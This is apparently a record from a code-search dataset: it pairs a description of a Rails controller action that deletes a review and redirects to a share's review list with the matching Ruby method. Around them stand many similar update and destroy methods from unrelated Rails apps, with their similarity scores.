"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to categories_url, notice: 'レビューの更新完了です!' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_review\n @review = Review.find(params[:id])\n @review.update(params[:review])\n redirect \"/reviews/#{@review.id}\"\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n format.js {render nothing: true}\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review.lecture, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review.lecture }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n @submission = ReviewSubmission.new(:review_id => @review.id, :submission_date => Time.now)\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n if @submission.save\n SubmissionNotifier.deliver_resubmission_notification(@submission)\n format.html { redirect_to(@review, :notice => 'Review and Submission were successfully created.') }\n else\n format.html { redirect_to(@review, :notice => 'Review was successfully created but the submission was not.') }\n end\n format.html { redirect_to(@review, :notice => 'Review was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update_reviews\n review_notes = self.reviews.map do |review|\n {review.notes => review.id}\n end\n if review_notes.length == 0\n @@prompt.select(\"No reviews to update\".colorize(:yellow)) do |menu|\n menu.choice \"Back\", -> { self.main_menu }\n end\n else\n review_id = @@prompt.select(\"Select review to update\", review_notes)\n review = Review.find(review_id)\n \n new_rev = @@prompt.ask(\"Please type your new note: \")\n review.notes = new_rev\n review.save\n review.reload\n end\n\n self.reload\n\n puts \"------------------------\"\n @@prompt.select(\"\") do |menu|\n menu.choice \"Back\", -> {self.main_menu}\n end\n end",
"def update\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to vendor_path(@review.vendor, view: \"recomendacoes\"), notice: 'A sua avaliação foi atualizada com sucesso' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n redirect_to @review.story, notice: 'Review was successfully updated.'\n else\n render :edit\n end\n end",
"def update\n\t\treview = Review.find(params['id'].to_i) if params['id']\n\t\treview.review_text = params['review_text'] if params['review_text']\n\t\treview.rating = params['rating'] if params['rating']\n\t\treview.reviewer_id = params['reviewer_id'] if params['reviewer_id']\n\t\treview.user_id = params['user_id'].to_i if params['user_id']\n\t\treview.trip_id = params['trip_id'].to_i if params['trip_id']\n\t\treview.save\n\tend",
"def update\n @professor_review = ProfessorReview.find(params[:id])\n\n respond_to do |format|\n if @professor_review.update_attributes(params[:professor_review])\n format.html { redirect_to(@professor_review, :notice => 'Professor review was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @professor_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n #find the individual review\n @review = Review.find(params[:id])\n\n #check to see if you're the poster\n if @review.user != @current_user\n #take it back to homepage\n redirect_to root_path\n else\n #update the new info from the form - update with new info from the form\n if @review.update(form_params)\n #redirect to individual show page\n redirect_to review_path(@review)\n else\n # using this it will render any validation to the main edit page\n render \"edit\"\n end\n end\n end",
"def update\n respond_to do |format|\n if @item_review.update(item_review_params)\n format.html { redirect_to @item_review, notice: 'Item review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n # Broadcast updated review on list from model.\n format.turbo_stream\n format.html { redirect_to recipe_path(@recipe, anchor: \"review_#{@review.id}\"), notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @recipe }\n else\n format.turbo_stream do\n # Display errors.\n render turbo_stream: turbo_stream.replace(\"review_form_review_#{@review.id}\",\n partial: \"reviews/form\", locals: { recipe: @recipe, review: @review })\n end\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t@review = Review.find(params[:id])\n\n\t\tif @review.update(review_params.merge(:contract_id => @review.contract_id))\n\t\t\tredirect_to @review\n\t\telse\n\t\t\trender 'edit'\n\t\t\t# => Error when updating empty body element.\n\t\tend\n\tend",
"def update\n respond_to do |format|\n if @hm_review.update(hm_review_params)\n format.html { redirect_to @hm_review, notice: 'Hm review was successfully updated.' }\n format.json { render :show, status: :ok, location: @hm_review }\n else\n format.html { render :edit }\n format.json { render json: @hm_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t@review.user_id = current_user.id\n\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n\t\tformat.js\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n\t\tformat.js { render 'shared/errors' }\n end\n end\n end",
"def update\n respond_to do |format|\n if @blade_review.update(blade_review_params)\n format.html { redirect_to blade_reviews_path, notice: 'Blade review was successfully updated.' }\n format.json { render :show, status: :ok, location: @blade_review }\n else\n format.html { render :edit }\n format.json { render json: @blade_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t# Attempts to update review using user inputs\n\t\tif @review.update(review_params)\n\t\t\t# Once updated, redirected to show page of car\n\t\t\tredirect_to car_path(@car)\n\t\telse\n\t\t\t# If not updated, edit form is loaded once again\n\t\t\trender 'edit'\n\t\tend\n\tend",
"def update\n @review = current_user.reviews.find_by_id(params[:id])\n if @review.nil?\n flash[:notice] = t(:review_not_found)\n return redirect_back_or_default()\n else\n @reviewable = @review.reviewable\n @review.content = params[:review][:content]\n @review.reviewable_id = params[:review][:reviewable_id]\n @review.reviewable_type = params[:review][:reviewable_type]\n end\n\n respond_to do |format|\n #if @review.update_attributes(params[:review])\n if @review.save\n format.html { redirect_to review_path(@review), :notice => t(:review_updated) }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n if @review.update(review_params)\n head :no_content\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n if @review.update(review_params)\n head :no_content\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n if @review.update(review_params)\n head :no_content\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n @review = @post.reviews.where(user_id: current_user.id).find(params[:id])\n @review.update_attributes(params[:review])\n respond_with @post, @review, location: post_path(@post, anchor: \"review_#{@review.id}\")\n end",
"def update\n @title = t 'conclusion_draft_review.edit_title'\n\n respond_to do |format|\n if @conclusion_draft_review.update(conclusion_draft_review_params)\n flash.notice = t 'conclusion_draft_review.correctly_updated'\n format.html { redirect_to(edit_conclusion_draft_review_url(@conclusion_draft_review)) }\n else\n format.html { render action: :edit }\n end\n end\n\n rescue ActiveRecord::StaleObjectError\n flash.alert = t 'conclusion_draft_review.stale_object_error'\n redirect_to edit_conclusion_draft_review_url(@conclusion_draft_review)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n @post.review!\n format.html { redirect_to @post, notice: 'Anúncio atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @item_review.update(item_review_params)\n format.html { redirect_to @item_review, notice: 'Item review was successfully updated.' }\n format.json { render :show, status: :ok, location: @item_review }\n else\n format.html { render :edit }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to_creative :ok, 'Review was successfully updated.', :edit\n end",
"def update\n respond_to do |format|\n if @correction_review.update(correction_review_params)\n format.html { redirect_to @correction_review, notice: 'Correction review was successfully updated.' }\n format.json { render :show, status: :ok, location: @correction_review }\n else\n format.html { render :edit }\n format.json { render json: @correction_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = @place.reviews.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to reviews_path, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @auditreview.update(auditreview_params)\n format.html { redirect_to action: \"index\", notice: 'Auditreview was successfully updated.' }\n format.json { render :show, status: :ok, location: @auditreview }\n else\n format.html { render :edit }\n format.json { render json: @auditreview.errors, status: :unprocessable_entity }\n end\n end\n end",
"def edit_review\n # client should be able to edit a review.\n puts \"Which review would you like to edit?\"\n pp Client.find_by(name: @@client_name).reviews\n puts \"Please enter the ID\"\n input = gets.strip\n selected_review = Review.find_by(id: input)\n puts \"What would you like for the new review to say?\"\n input = gets.strip\n selected_review.update(text_body: input)\n puts \"Your review has been updated, here's the new review:\"\n pp selected_review\n client_continue\n end",
"def update_review_text(user, game, tracer)\n display_menu_header([\"Update My Review of\", \"'#{game.name}':\"], user)\n entry = display_string_menu([\"Write a new review below and hit 'Enter' to save:\", \"\"], [])\n Review.find_by(user_id: user.id, game_id: game.id).update(review_text: entry)\n display_footer([\"Review text successfully updated for\", \"'#{game.name}'.\"])\n menu_routing(user, game, tracer)\nend",
"def update\n respond_to do |format|\n if @boo_k_review.update(boo_k_review_params)\n format.html { redirect_to @boo_k_review, notice: 'Boo k review was successfully updated.' }\n format.json { render :show, status: :ok, location: @boo_k_review }\n else\n format.html { render :edit }\n format.json { render json: @boo_k_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_review(user,school) \n# the \"usersreviews\" var iterates through all reviews and returns an array of reviews that match the users ID \n usersreviews = Review.all.select { |review| review.user_id == user.id }\n usersreviews= user.reviews\n#============================================================================================================= \n users_content = usersreviews.each { |review| p \"#{review.content} for #{review.school.name}\" }\n# \"users_content\" var captures a particular users reviews and prints out the content of each review\n#========================================================================================================== \n\n# i then prompt the user to select the content of the review they want to update and have them enter it to search \n#for that review in the database and return it so that it can then be updated\n puts \"Your reviews are listed above please enter the content you would like to update\"\n users_content_choice = gets.chomp\n puts \"please enter your revision\"\n content_to_change = Review.find_by(content:users_content_choice)\n updated_input = gets.chomp\n content_to_change.update(content:updated_input)\n #==================================================================================== \n puts \"Your review has been updated\"\n @prompt.select(\"please select an option to continue or logout\") do |menu|\n menu.choice \"continue\", -> { self.enter_school_name_prmpt }\n menu.choice \"logout\", -> { `open https://www.google.com/` } \n end \n end",
"def update\n\t\t@set_def_avt=params[:review][:default_avatar]\n\t\t@review.cover_page.destroy if @set_def_avt\n\n\t\trespond_to do |format|\n\t\t\tif @review.update(review_params)\n\t\t\t\t@reviews = Review.order(:heading).paginate(page: params[:page], per_page: 18)\n\t\t\t\tformat.html { redirect_to @review; flash[:info]= 'review was successfully updated.' }\n\t\t\t\tformat.json { render :show, status: :ok, location: @review }\n\t\t\t\tformat.js\n\t\t\telse\n\t\t\t\tformat.html { render :edit }\n\t\t\t\tformat.json { render json: @review.errors, status: :unprocessable_entity }\n\t\t\t\tformat.js\n\t\t\tend\n\t\tend\n\tend",
"def update\n respond_to do |format|\n if @admin_nature_of_review.update(admin_nature_of_review_params)\n format.html { redirect_to @admin_nature_of_review, notice: 'Nature of review was successfully updated.' }\n format.json { render :show, status: :ok, location: @admin_nature_of_review }\n else\n format.html { render :edit }\n format.json { render json: @admin_nature_of_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n flash[:success] = \"수정 성공\"\n format.html { redirect_to @review }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @event_review.update(event_review_params)\n format.html { redirect_to @event_review, notice: 'Event review was successfully updated.' }\n format.json { render :show, status: :ok, location: @event_review }\n else\n format.html { render :edit }\n format.json { render json: @event_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @tour_review.update(tour_review_params)\n format.html { redirect_to @tour_review, notice: 'ツアーレビューが正常に更新されました。' }\n format.json { render :show, status: :ok, location: @tour_review }\n else\n format.html { render :edit }\n format.json { render json: @tour_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if (allowAccessIfOwnerNameIsOrRankAtLeast(\"#{@review.poster}\", 1))\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n end\n end\n else\n respond_to do |format|\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n flash[:notice] = 'You do not have permission to edit this review'\n\n end\n end\n end",
"def update\n respond_to do |format|\n if @visitor_review.update(visitor_review_params)\n format.html { redirect_to @visitor_review, notice: 'Visitor review was successfully updated.' }\n format.json { render :show, status: :ok, location: @visitor_review }\n else\n format.html { render :edit }\n format.json { render json: @visitor_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @thesis_review = ThesisReview.find(params[:id])\n\n respond_to do |format|\n if @thesis_review.update_attributes(params[:thesis_review])\n format.html { redirect_to(@thesis_review, :notice => 'ThesisReview was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @thesis_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @reviews_and_rating.update(reviews_and_rating_params)\n format.html { redirect_to @reviews_and_rating, notice: 'Reviews and rating was successfully updated.' }\n format.json { render :show, status: :ok, location: @reviews_and_rating }\n else\n format.html { render :edit }\n format.json { render json: @reviews_and_rating.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @book_review = BookReview.find(params[:id])\n\n respond_to do |format|\n if @book_review.update_attributes(params[:book_review])\n format.html { redirect_to @book_review, notice: 'Book review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @book_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n @boardgame = Boardgame.find(params[:boardgame_id])\n render json: @boardgame, status: :ok\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update_review(movie, status)\n\tcheck = user_already_reviewed(movie)\n\t#if none returns 0\n\tif check == -1\n\t @update_review = 0\n\t#else returns the review id \n\telse\n\t reviewFound = movie.reviews.where('user_id' => current_user.id).first\n\t @update_review = reviewFound.id\n\tend\nend",
"def update\n\t\t@book_review = BookReview.find(params[:id])\n\n\t\trespond_to do |format|\n\t\t\tif @book_review.update_attributes(params[:book_review])\n\t\t\t\tformat.html { redirect_to @book_review, :notice => 'Book review was successfully updated.' }\n\t\t\t\tformat.json { head :ok }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"edit\" }\n\t\t\t\tformat.json { render :json => @book_review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def reviewboard_update\n user = User.find(params[:id])\n user.reviewboard = params[:reviewboard]\n user.save\n flash[:alert] = \"The review board status has been updated\"\n redirect_to admin_user_admins_path\n end",
"def update\n respond_to do |format|\n if @bizowners_review.update(bizowners_review_params)\n format.html { redirect_to @bizowners_review, notice: 'Bizowners review was successfully updated.' }\n format.json { render :show, status: :ok, location: @bizowners_review }\n else\n format.html { render :edit }\n format.json { render json: @bizowners_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_review_status_if_changes_substantial\n return unless @description.save_version?\n\n @description.update_review_status(@description.review_status)\n end",
"def update\n @review = Review.find(params[:id])\n @review.update(review_params)\n render json: @review\n end",
"def update\n @comment = Comment.find(params[:id])\n @repbody = Repbody.find(params[:repbody_id])\n @update = Update.new\n @current = Time.now\n @comment.date = @current.strftime('%Y-%m-%d %H:%M:%S')\n respond_to do |format|\n if @comment.update_attributes(comment_params)\n @update.date = @current.strftime('%Y-%m-%d %H:%M:%S')\n @update.comment = \"コメント更新 [#{@current_user.username}] \"\n @update.repbody_id = @repbody.id\n @update.save\n if params[:revised] == '1'\n Repbody.where(:id => @update.repbody_id).update_all(:fix => 'f')\n else\n Repbody.where(:id => @update.repbody_id).update_all(:fix => 't')\n end\n format.html { redirect_to user_repbody_path(@repbody.user_id, @repbody.id), :notice => '【メッセージ】コメントは正しく更新されました.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @comment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n render json: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\nend",
"def update\n respond_to do |format|\n if @product_review.update(product_review_params)\n format.html { redirect_to @product_review, notice: 'Product review was successfully updated.' }\n format.json { render :show, status: :ok, location: @product_review }\n else\n format.html { render :edit }\n format.json { render json: @product_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @fourth_review.update(fourth_review_params)\n format.html { redirect_to team_path(@fourth_review.team_id), notice: 'Fourth review was successfully updated.' }\n format.json { render :show, status: :ok, location: @fourth_review }\n else\n format.html { render :edit }\n format.json { render json: @fourth_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @peer_review.update(peer_review_params)\n format.html { redirect_to @peer_review, notice: 'Peer review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @peer_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @food_review.update(food_review_params)\n format.html { redirect_to @food_review, notice: 'Food review was successfully updated.' }\n format.json { render :show, status: :ok, location: @food_review }\n else\n format.html { render :edit }\n format.json { render json: @food_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @restaurant_review.update(restaurant_review_params)\n format.html { redirect_to @restaurant_review, notice: 'Restaurant review was successfully updated.' }\n format.json { render :show, status: :ok, location: @restaurant_review }\n else\n format.html { render :edit }\n format.json { render json: @restaurant_review.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.79077613",
"0.7738259",
"0.76770145",
"0.7647901",
"0.7647381",
"0.75905484",
"0.7584547",
"0.75218093",
"0.74996525",
"0.74972767",
"0.74942213",
"0.74378693",
"0.74378693",
"0.74378693",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7422253",
"0.742138",
"0.7400981",
"0.73992604",
"0.7380647",
"0.73788726",
"0.73703265",
"0.7366873",
"0.7366873",
"0.7366873",
"0.7366873",
"0.73434585",
"0.7338962",
"0.7338261",
"0.7326509",
"0.7325427",
"0.73197025",
"0.7307375",
"0.7300721",
"0.72958744",
"0.72940046",
"0.7284665",
"0.728409",
"0.72682333",
"0.7232399",
"0.7227717",
"0.7226365",
"0.7220432",
"0.72147256",
"0.72145885",
"0.7213411",
"0.7208314",
"0.7201438",
"0.71999687",
"0.71893704",
"0.7186311",
"0.7180414",
"0.71759874",
"0.7164904",
"0.71635634",
"0.7156634",
"0.7156634",
"0.7156634",
"0.7150131",
"0.7137036",
"0.7131332",
"0.71306264",
"0.7129282",
"0.71221167",
"0.7069495",
"0.70674497",
"0.7056891",
"0.7045524",
"0.7032392",
"0.70304704",
"0.70243496",
"0.7005989",
"0.69930464",
"0.69821584",
"0.6959596",
"0.69552886",
"0.6945294",
"0.6937124",
"0.6930283",
"0.69225675",
"0.6909407",
"0.6907614",
"0.68925047",
"0.68720716",
"0.68563545",
"0.6814185",
"0.67960835",
"0.67958415",
"0.67943484",
"0.6787407",
"0.6769511",
"0.67282975",
"0.6724606",
"0.67083263"
] |
0.7721352
|
2
|
The destroy method deletes a review and redirects back to the share's review list with a confirmation notice
|
def destroy
@review = Review.find(params[:id])
@review.destroy
redirect_to share_reviews_path(@share), notice: "Review successfully deleted!"
end
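The share_reviews_path helper used in the redirect implies that reviews are nested under shares in the router. A sketch of routing that would generate that helper (the actual config/routes.rb is not shown):

# config/routes.rb -- assumed nesting that yields share_reviews_path(@share)
resources :shares do
  resources :reviews
end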
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @review.destroy\n end",
"def destroy\n @review = find_review\n @review.destroy\n redirect_to reviews_path\n end",
"def destroy\n @review.destroy\n\n head :no_content\n end",
"def destroy\n @review.destroy\n\n head :no_content\n end",
"def destroy\n @review.destroy\n\n head :no_content\n end",
"def destroy\n @review.destroy\n redirect_to root_url\n end",
"def destroy\n\t\t@review.destroy\n\t\tredirect_to admins_path\n\tend",
"def destroy\n\t\t\t\tDriverReview.destroy(current_review)\n\t\t\t\trender_success\n\t\t\tend",
"def destroy\n\t\t@review = Review.find(params[:id])\n\t\t@review.destroy\n\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to(reviews_url) }\n\t\t\tformat.xml { head :ok }\n\t\tend\n\tend",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n flash[:notice] = \"This review was successfully deleted!\"\n redirect_to root_path\n end",
"def destroy\n @review = Review.find params[:id]\n @review.destroy\n redirect_to :back\n end",
"def destroy\n @review.destroy\n flash[:success] = 'レビューを削除しました。'\n redirect_back(fallback_location: root_path)\n end",
"def destroy\n @review.destroy\n @apn.update_attribute(:reviewed, false)\n flash[:notice] = \"Review was destroyed\"\n redirect_to root_path\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: \"振り返りを削除しました。\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n\t\t@review.destroy\n\t\tredirect_to car_path(@car)\n\tend",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n respond_to do |format|\n format.html { redirect_to @review.lecture, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(review_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n Review.destory(params[:id])\nend",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to publication_reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = reviewable.reviews.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviewable_reviews_url(reviewable) }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: \"レビューが削除されました\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete_user\n delete_reviews(self)\n self.destroy\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = @post.reviews.where(user_id: current_user.id).find(params[:id])\n @review.destroy\n respond_with @post, @review, location: post_path(@post, anchor: \"reviews\")\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to places_url, notice: 'Review was successfully destroyed.' }\n end\n end",
"def destroy\n @critic_review.destroy\n respond_to do |format|\n format.html { redirect_to critic_reviews_url, notice: 'Critic review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to dashboard_show_path, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n #If destroyed, it display the notice.\n format.html { redirect_to reviews_url, notice: t('review.destroy') }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to project_path(@project), notice: 'Review was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n\t\t@review.destroy\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n\t\t\tformat.json { head :no_content }\n\t\t\tformat.js\n\t\tend\n\tend",
"def destroy\n @story = @review.story\n @review.destroy\n redirect_to story_url(@story), notice: 'Review was successfully destroyed.'\n end",
"def destroy\n unless current_user.is_review_moderator?\n redirect_to denied_path\n return\n end\n\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n # Broadcast remove review on list from model.\n format.turbo_stream { render turbo_stream: \"\" }\n format.html { redirect_to recipe_path(@recipe, anchor: \"reviews_header\"), notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to restaurent_path(@restaurent.id),\n notice: \"Review was successfully destroyed\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize! :destroy, ReviewsController\n @review = Review.find(params[:id])\n if @review\n @review.destroy\n flash[:success] = 'Запись была успешно удалена!'\n else\n flash[:error] = 'Запись не найдена.'\n end\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = @place.reviews.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully removed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n temp_id = @review.user_id\n Review.find(params[:id]).destroy\n flash[:success] = \"Review Deleted\"\n redirect_to user_path(temp_id)\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to categories_url, notice: 'レビューの削除完了です!' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Product.find(params[:product_id]).reviews.find(params[:id])\n @review.destroy\n redirect_to :back\n end",
"def destroy\n @hm_review.destroy\n respond_to do |format|\n format.html { redirect_to hm_reviews_url, notice: 'Hm review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id]) # param comes from route\n @review.destroy\n\n redirect_to restaurant_path(@restaurant.id)\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to :back }\n format.json { head :no_content }\n end\n end",
"def destroy\n prof_id = @review.professor_id\n @review.destroy\n respond_to do |format|\n format.html do\n redirect_to professor_path(prof_id),\n notice: 'Review was successfully destroyed.'\n end\n format.json { head :no_content }\n end\n end",
"def destroy\n @user = current_user\n @review = Review.find(params[:id]).delete\n render json: { msg: \"Delete Successful\" }\n end",
